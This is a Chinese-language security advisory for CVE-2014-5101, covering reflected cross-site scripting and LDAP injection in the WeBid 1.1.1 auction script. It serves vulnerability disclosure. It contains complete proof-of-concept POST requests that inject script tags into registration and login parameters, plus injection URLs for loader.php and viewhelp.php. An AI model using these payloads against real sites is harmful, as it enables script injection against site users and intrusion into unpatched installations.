发布日期：2014-07-10
更新日期：2014-08-01

受影响系统：

WeBid WeBid 1.x

描述：

---

BUGTRAQ  ID: 68519
CVE(CAN) ID: CVE-2014-5101

WeBid是开源拍卖脚本软件包。

WeBid 1.1.1及其他版本存在多个跨站脚本和LDAP注入漏洞，远程攻击者通过js或cat参数，利用此漏洞可执行LDAP注入攻击。

<*来源：Govind Singh
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1. http://www.example.com/WeBid/register.php

Reflected Cross-Site Scripting in the parameters are :
"TPL_name="
"TPL_nick="
"TPL_email"
"TPL_year"
"TPL_address"
"TPL_city"
"TPL_prov"
"TPL_zip"
"TPL_phone"
"TPL_pp_email"
"TPL_authnet_id"
"TPL_authnet_pass"
"TPL_wordpay_id"
"TPL_toocheckout_id"
"TPL_moneybookers_email"

PoC :
we can run our xss script with all these different parameters

Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
----------------------------------------------------------------------------------------------------------------
2. http://www.example.com/WeBid/user_login.php

Reflected Cross-Site Scripting in the parameter is :
"username"

Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login
==================================================================================================================
2. LDAP Injection

PoC :
http://www.example.com/WeBid/loader.php?js=[LDAP]
http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;

PoC
http://www.example.com/WeBid/viewhelp.php?cat=[LDAP]
Replace cat= as 1,2,3,4

建议：

---

厂商补丁：

WeBid
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.webidsupport.com/forums/content.php?8-about

参考：http://packetstormsecurity.com/files/127431/WeBid-1.1.1-Cross-Site-Scripting-LDAP-Injection.html

浏览次数：2839
严重程度：0（网友投票）